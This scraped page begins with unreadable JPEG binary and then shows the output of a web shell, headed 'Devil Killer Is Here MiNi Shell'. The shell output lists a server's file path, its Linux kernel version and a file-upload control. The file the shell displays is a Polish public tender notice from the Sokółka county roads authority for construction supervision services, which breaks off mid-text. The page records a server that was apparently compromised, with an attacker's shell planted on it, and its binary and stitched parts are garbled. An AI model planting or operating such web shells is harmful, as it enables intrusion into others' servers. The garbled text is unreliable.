JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220413/0012039302-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie nadzoru inwestorskiego nad zadaniem: Budowa hali magazynowo – garażowej na potrzeby Obwodu Drogowo – Mostowego Nr 1 w Sokółce. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Sokółce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050667308</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Torowa 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sokółka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">85 711 89 09; 85 711 89 10</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">85 711 22 29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzial.techniczny@pzd.sokolka.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pzd.sokolka.com</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie drogami powiatowymi oraz przeprowadzanie i nadzorowanie prac remontowych i modernizacyjnych w budynkach będących własnością Powiatu Sokólskiego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie nadzoru inwestorskiego nad zadaniem: Budowa hali magazynowo – garażowej na potrzeby Obwodu Drogowo – Mostowego Nr 1 w Sokółce. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3afa689f-baec-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00120393</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00014726/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa hali magazynowo - garażowej na potrzeby Obwodu Drogowo - Mostowego Nr 1 w Sokółce</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.pzd.sokolka.com/index.php?go=przetargi/22WDdui2/przetarg <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/,<br/>https://epuap.gov.pl/wps/portal,<br/>dzial.techniczny@pzd.sokolka.com</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej –<br/>dzial.techniczny@pzd.sokolka.com 2. Osoby do kontaktu z Wykonawcami Zamawiający wskazuje w<br/>pkt 11 SWZ – Instrukcji dla Wykonawców. 3. Wykonawca zamierzający wziąć udział w postępowaniu o<br/>udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto<br/>na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty<br/>lub wniosku” oraz do „Formularza do komunikacji”. 4. Wymagania techniczne i organizacyjne wysyłania<br/>i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu<br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej<br/>(ePUAP). 5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi<br/>150MB. 6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na<br/>ePUAP. 7. Zamawiający przekazuje link do postępowania oraz ID postępowania jako<br/>załącznik do SWZ. Dane postępowanie można wyszukać również na Liście wszystkich<br/>postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania. 8. Zalecenia Zamawiającego odnośnie podpisu kwalifikowanego: 1) dla dokumentów w<br/>formacie „pdf” zaleca się podpis formatem PAdES, 2) dokumenty w formacie innym niż „pdf” zaleca się<br/>podpisywać formatem XAdES. 9. Zalecenia Zamawiającego odnośnie podpisu osobistego: 1) dla<br/>dokumentów w formacie „pdf” lub „xml” zaleca się podpis wewnętrzny (otoczony), 2) dokumenty w<br/>formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym. 10. W celu<br/>korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem<br/>teleinformatycznym z dostępem do sieci Internet. Aplikacja działa na Platformie Windows, Mac i Linux.<br/>Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru<br/>danych: 1) specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2, 2)<br/>format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8, 3) oznaczenia czasu odbioru danych - miniPortal - wszelkie operacje opierają się o czas<br/>serwera i dane zapisywane są z dokładnością co do setnej części sekundy, 4) integracja z systemem<br/>ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP. W przypadku<br/>Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego automatycznie generuje<br/>Rodzaj Urzędowego Poświadczenia Odbioru czyli Urzędowe Poświadczenie Przedłożenia (UPP), które<br/>jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane poświadczenia&#34; jest zawarta<br/>informacja o dacie doręczenia. UWAGA: cdn. w sekcji IX - pozostałe informacje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 i 14 RODO, informuję,<br/>że:1)Administratorem Pani/Pana danych osobowych jest Powiatowy Zarząd Dróg w Sokółce, ul.<br/>Torowa 12, 16-100 Sokółka, tel. 85 711 89 09, e-mail: biuro@pzd.sokolka.com2)W sprawach<br/>związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych w PZD w Sokółce, ul. Torowa 12, 16-100 Sokółka, tel. 85 711 89 09, e-mail: iod@pzd.sokolka.com3)Dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu prowadzenia postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia,<br/>zawarcia umowy oraz jej realizacji, a także udokumentowania postępowania i jego<br/>archiwizacji4)Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Ustawy PZP, a także inne podmioty w<br/>zakresie i na zasadach określonych przepisamiprawa5)Administrator przetwarza następujące kategorie<br/>danych: imię i nazwisko, dane teleadresowe, stanowisko służbowe, rodzaj umowy o pracę<br/>itp.6)Administrator pozyskuje dane osobowe osób innych niż Wykonawca, od Wykonawcy, np.: dane<br/>osobowe pełnomocnika, osób zatrudnionych przez Wykonawcę lub Podwykonawcę na podstawie<br/>umowy o pracę wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji<br/>zamówienia, osób fizycznych skierowanych przez Wykonawcę do realizacji umowy itp. 7)Dane<br/>osobowe Wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5 lat (10<br/>lat w przypadku zamówień współfinansowanych ze środków UE) począwszy od 1 stycznia roku<br/>kalendarzowego następującego po zakończeniu okresu obowiązywania umowy. Okresy te dotyczą<br/>również Wykonawców, którzy złożyli oferty i nie zostały one uznane, jako najkorzystniejsze (nie<br/>zawarto z tymi Wykonawcami umowy)8) Obowiązek podania danych osobowych bezpośrednio<br/>dotyczących jest wymogiem ustawowym określonym w przepisach Pzp związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp 9)W odniesieniu<br/>do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 RODO10)Posiada Pani/Pan:a)na podstawie art. 15<br/>ust. 1-3 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (Zamawiający może<br/>żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowania żądania, w szczególności podania nazwy lub daty postępowania o zamówienia<br/>publicznego)b)na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może<br/>naruszać integralności protokołu oraz jego załączników)c)na podstawie art. 18 ust. 1 RODO prawo<br/>żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego)d)prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO11)nie przysługuje Pani/Panu: a)w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych b)prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO c)na podstawie art. 21 RODO<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W trakcie oraz po zakończeniu postępowania o udzielenie<br/>zamówienia publicznego, w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3<br/>rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od<br/>osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD/WD-Ui/4112/2/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Pełnienie nadzoru inwestorskiego nad zadaniem: Budowa hali magazynowo – garażowej na potrzeby Obwodu Drogowo –<br/>Mostowego Nr 1 w Sokółce.<br/>1.1. Zamówienie obejmuje zrealizowanie zamówienia pn.: Pełnienie nadzoru inwestorskiego nad zadaniem: Budowa hali<br/>magazynowo – garażowej na potrzeby Obwodu Drogowo – Mostowego Nr 1 w Sokółce”.<br/>1.2. Inspektor Nadzoru Inwestorskiego nadzoruje cały proces inwestycyjny robót wynikających z wydanych decyzji pozwolenia na budowę, projektów budowlanych, zawartych umów z wykonawcami robót budowlanych oraz wszystkie czynności wynikające z Prawa Budowlanego, rozporządzeń Ministra Infrastruktury, a w szczególności w zakresie:<br/>1) reprezentowania Zamawiającego na budowie poprzez sprawowanie kontroli zgodności realizacji budowy z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej;<br/>2) posiadania znajomość dokumentacji techniczno-prawnej, terenu budowy, jego uzbrojenia i zagospodarowania;<br/>3) dokonywania sprawdzania i odbioru robót budowlanych ulegających zakryciu (na przykład zbrojenia konstrukcji przed ich zabetonowaniem, ułożenie izolacji przed wykonaniem warstw zabezpieczających) lub zanikających (na przykład deskowania czy rusztowania);<br/>4) sprawdzania obmiarów robót wykonanych przez Wykonawcę robót;<br/>5) organizowania prac związanych z nadzorem tak, aby z tego tytułu nie było zbędnych przerw w realizacji robót przez Wykonawcę;<br/>6) zatwierdzania planu BIOZ, kontrolowania przestrzegania przez Wykonawcę zasad i przepisów BHP;<br/>7) opiniowania programu zapewnienia jakości (PZJ);<br/>8) prowadzenia systematycznej kontroli zgodności cech jakościowych wykonywanych elementów robót i wbudowywanych wyrobów budowlanych z wymaganiami specyfikacji technicznych oraz dokumentacji projektowej - w oparciu o wyniki badań, dostarczone przez Wykonawcę;<br/>9) dokonywania akceptacji stosowanej technologii robót o ile stwierdzą zgodność ze wszystkimi wymogami technicznymi oraz wymogami zawartymi w dokumentacji projektowej;<br/>10) uzyskiwania zgody od Zamawiającego w zakresie wszelkich odstępstw od dokumentacji na realizację robót;<br/>11) wykonywania czynności w zakresie akceptacji wszystkich materiałów stosowanych do budowy, pod kątem ich rodzaju, jakości i przydatności do wbudowania;<br/>12) kontrolowania i oceniania przedkładanych świadectw jakościowych, atestów na materiały i aprobat technicznych;<br/>13) egzekwowania od Wykonawcy wykonania dodatkowych badań i pomiarów, względnie przeprowadzenia badań niezależnych - w przypadku wątpliwości, co do wiarygodności badań Wykonawcy;<br/>14) uczestniczenia w próbach i odbiorach technicznych instalacji, urządzeń;<br/>15) sprawdzania świadectw dokumentujących przeprowadzenie legalizacji i wykalibrowania sprzętu do pomiarów i badań, używanego przez Wykonawcę i na tej podstawie - dopuszczanie do użytku;<br/>16) sprawdzania zakresu rzeczowego robót przez udział w obmiarach;<br/>17) potwierdzania faktycznie wykonanych robót oraz usuniętych wad;<br/>18) dokonywania rozliczenia Umowy w przypadku jej wypowiedzenia;<br/>19) przyjmowania zgłoszenia Wykonawcy o zakończeniu robot (wpisem do dziennika budowy) i po jego sprawdzeniu skontrolowaniu i zaaprobowaniu operatu kolaudacyjnego wpisem do dziennika budowy - powiadamianie Zamawiającego o gotowości robót do odbioru ostatecznego;<br/>20) zobowiązania do sprawdzania wszystkich niezbędnych dokumentów do dopuszczenia do użytkowania obiektu;<br/>21) brania udziału w pracach komisji odbioru ostatecznego, odbioru po okresie gwarancji i rękojmi, po uprzednim sprawdzeniu usunięcia wad i powiadomieniu o tym Zamawiającego;<br/>22) zobowiązania do obecności na budowie oraz w siedzibie Zamawiającego według potrzeb dla prawidłowej realizacji zadania i nie rzadziej niż raz w tygodniu;<br/>23) uczestniczenia w koordynacyjnych spotkaniach roboczych zwoływanych przez Zamawiającego w zależności od potrzeb, nie częściej niż raz w tygodniu przez okres realizacji inwestycji;<br/>24) nadzorowania realizacji robót związanych z usuwaniem wad zaistniałych w okresie rękojmi/gwarancji i poświadczania ich wykonania.<br/>1.3. Zamawiający, stosownie do treści art. 95 Ustawy z dnia 11 września 2019r. - Prawo zamówień publicznych (tj. Dz.U. z 2021 r. poz. 1129 z późn. zm.) wymaga realizacji zamówienia w zakresie zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy.<br/>1.4. Wymagania zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia zostały określone w Rozdziale II. Projektowane postanowienia umowy w sprawie zamówienia publicznego przedmiotowego zamówienia. Powyższe wymagania określają w szczególności:<br/>1) rodzaj czynności związanych z realizacją zamówienia, których dotyczą wymagania zatrudnienia na podstawie stosunku pracy przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia;<br/>2) sposób weryfikacji zatrudnienia tych osób;<br/>3) uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wmagań.<br/>1.5. Przedmiot zamówienia szczegółowo opisany jest w Rozdziałach II. – III. SWZ (Specyfikacji Warunków Zamówienia).<br/>1.6. Szacunkowa wartość robót budowlanych dla zadania: pn.: „Budowa hali magazynowo – garażowej na potrzeby Obwodu Drogowo – Mostowego Nr 1 w Sokółce” wynosi 928 873,09 zł netto.<br/>Przebieg ww. postępowania o udzielenie zamówienia publicznego na roboty budowlane zamieszczony jest pod adresem (link do postępowania): https://www.pzd.sokolka.com/index.php?go=przetargi/22WDdbi4/przetarg. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami:<br/>1. Cena – waga kryterium – 60% (60 punktów)<br/>Oferta najtańsza otrzyma max. 60 pkt. Pozostałe proporcjonalnie mniej, według formuły:<br/>An=(Cmin/Cn)x60<br/>gdzie:<br/>An – liczba punktów za spełnienie kryterium cena<br/>C min – cena minimalna wśród złożonych ofert<br/>C n – cena zaproponowana przez konkretnego Wykonawcę<br/>60 – maksymalna ilość punktów<br/>Wyliczona wartość An zaokrąglana będzie do 2 miejsc po przecinku.<br/>2. Doświadczenie zawodowe osoby wskazanej do pełnienia funkcji Inspektora nadzoru inwestorskiego w specjalności konstrukcyjno<br/>- budowlanej – waga kryterium – 40% (40 punktów) [Inb]<br/>1) Ocena dokonana zostanie na podstawie doświadczenia w specjalności konstrukcyjno – budowlanej osoby wskazanej przez<br/>Wykonawcę do pełnienia w trakcie realizacji zamówienia funkcji Inspektora nadzoru inwestorskiego, rozumianego jako pełnienie<br/>obowiązków Inspektora nadzoru inwestorskiego, Kierownika budowy lub Kierownika robót przy budowie, rozbudowie, odbudowie lub<br/>przebudowie budynków.<br/>2) Punktacja za doświadczenie w specjalności konstrukcyjno – budowlanej osoby wskazanej przez Wykonawcę do pełnienia w<br/>trakcie realizacji zamówienia funkcji Inspektora nadzoru inwestorskiego, przyznawana będzie na podstawie wykazania ilości lat<br/>pełnienia przez tą osobę w specjalności konstrukcyjno – budowlanej obowiązków Inspektora nadzoru inwestorskiego, Kierownika<br/>budowy lub Kierownika robót przy budowie, rozbudowie, odbudowie lub przebudowie budynków.<br/>3) Jeden rok doświadczenia rozumiany jest jako suma dwunastu miesięcy przypadających bezpośrednio po sobie w danym okresie<br/>na przykład na przestrzeni dwóch lat lub suma dwunastu miesięcy z różnych okresów – kilku lat.<br/>4) Za wykazanie doświadczenia Inspektora Nadzoru Inwestorskiego w ilości do jednego roku oferta otrzyma 0 punktów.<br/>5) Ilość punktów w tym kryterium zostanie naliczona zgodnie z zasadą:<br/>Doświadczenie zawodowe osoby - do 1 roku - 0 pkt<br/>Doświadczenie zawodowe osoby - 1 rok - 20 pkt<br/>Doświadczenie zawodowe osoby - 2 lata i więcej - 40 pkt<br/>3. Za najkorzystniejsza ofertę zostanie uznana oferta, która otrzyma najwyższą sumę punktów według wzoru:<br/>S = [An] +[ Inb]<br/>gdzie:<br/>S – suma punktów przyznana ofercie,<br/>An – ilość punktów przyznanych ofercie w kryterium „Cena”<br/>Inb – ilość punktów przyznanych ofercie w kryterium „Doświadczenie zawodowe osoby wskazanej do pełnienia funkcji Inspektora<br/>nadzoru inwestorskiego w branży ogólnobudowlanej”.<br/>4. Spośród złożonych ofert, zostanie wybrana ta, która odpowiada wszystkim wymaganiom określonym w niniejszej specyfikacji 